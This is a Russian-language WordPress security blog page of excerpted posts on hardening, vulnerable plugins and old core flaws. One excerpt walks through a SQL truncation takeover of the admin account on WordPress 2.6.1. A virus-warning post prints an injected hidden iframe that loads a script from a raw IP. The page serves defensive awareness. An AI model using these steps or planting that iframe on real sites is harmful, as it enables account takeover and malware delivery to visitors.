Скрываем версию Wordpress
Для повышения безопасности блога, часто рекомендуют отключить отображение версии Wordpress. Инструкций как это сделать, огромное множество и все они могут использовать разные методы для отключения отображения версии, но самый просто и правильный вариант, это добавить в файл functions.php который находится в папке шаблона вашего блога, следующую строчку:
remove_action('wp_head', 'wp_generator');
Эта строчка отключает отображение версии Wordpress, для вашего читать далее ..
Уязвимость в файле wp-trackback.php
Свежая уязвимость в Wordpress которая позволяет провести DOS атаку на блог жертвы используя файл wp-trackback.php
Отключение трекбэков не избавляет от данной уязвимости, для того, чтобы обезопасить свой блог, необходимо установить плагин, который исправляет данную проблему.
Плагин можно скачать здесь
Эксплоит уязвимости: jarraltech.com/2009/10/new-0-day-wordpress-exploit/
Источник: blogproblog.com/wp-trackback_dos_attack/
Защита от перебора паролей в Wordpress
Для того, чтобы обезопасить свой блог, от взлома путем перебора паролей, необходимо установить ограничение количества неправильных логинов, в этом случае бот или человек, который задумает подобрать пароль к Вашему блогу, после определенного количества неправильных логинов, будет забанен на определенное время.
Сделать это можно очень легко, достаточно просто скачать и установить Wordpress плагин Limit Login Attempts. (как читать далее ..
Уязвимость в Wordpress ниже 2.6.3
Если вы еще не обновили свой блог, до версии 2.7, которая на данный момент является финальной стабильной версией Wordpress, возможно некоторые уязвимости в старых версиях Wordpress заставят вас задуматься об этом.
Jeremias Reith опубликовал уязвимость на сервис Bugtraq которая при удачном использовании позволяет злоумышленнику, получить доступ к панели администрирования вашего блога.
Данная уязвимость исправлена в версии Wordpress читать далее ..
Уязвимость усечения данных в SQL Wordpress 2.6.1
Найдена новая уязвимость в Wordpress 2.6.1 которая заключается в ошибке усечения данных в базе SQL.
Идем по ссылке server.com/wp-login.php?action=register
Регистрируемся как пользователь "admin x" и Ваш email
Логин выглядит как admin[55 пробелов]х
После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword
В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора.
Получаем письмо с ссылкой на сброс читать далее ..
Уязвимости в Contact Form ][ для Wordpress
Найдена уязвимость в плагинах контактной формы Wordpress - Contact Form версии 2.0.13 и ниже.
Плохая защита от ботов: отсутствие капчи, позволяет спам-ботам отправлять неограниченное количество спам-сообщений администратору сайта.
Использование функционала для рассылки спама: в форме контактов есть поле которое называется "Отправить копию самому себе", это настраивается в настройках плагина (CarbonCopy Ability), используя это поле, спам можно отправлять читать далее ..
Секретные ключи в Wordpress 2.6
Продолжая тему о уязвимости секретного ключа в файле конфигурации Wordpress, хочу обратить ваше внимание на то, что в новой версии Wordpress 2.6, кроме строчки “SECRET_KEY“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении Wordpress блога.
Строчки эти выглядят вот так:
define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.
define('SECURE_AUTH_KEY', 'впишите сюда читать далее ..
Внимание вирус!
Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется Google как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода.
<!-- Traffic Statistics --> <iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
Если у читать далее ..
Уязвимость Wordpress Plugin Download Manager 0.2
Уязвимость в данном скрипте, дает возможность атакующему закачать любой файл, на сервер. Это становится возможным из-за ошибки проверки входных данных в файле upload.php.
Исправления данной ошибки пока не существует, возможно будет выпущен патч, или ошибка будет исправлена в следующей версии Wordpress.
Пример использования данной уязвимости.
Wordpress 2.6 – еще больше безопасности
Вышла новая версия лучшего движка для блогов - Wordpress 2.6. В новой версии исправлено очень много ошибок и уязвимостей, а также проделано много работы для повышения безопасности блога.
Теперь после установки Wordpress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках. Теоритически читать далее ..
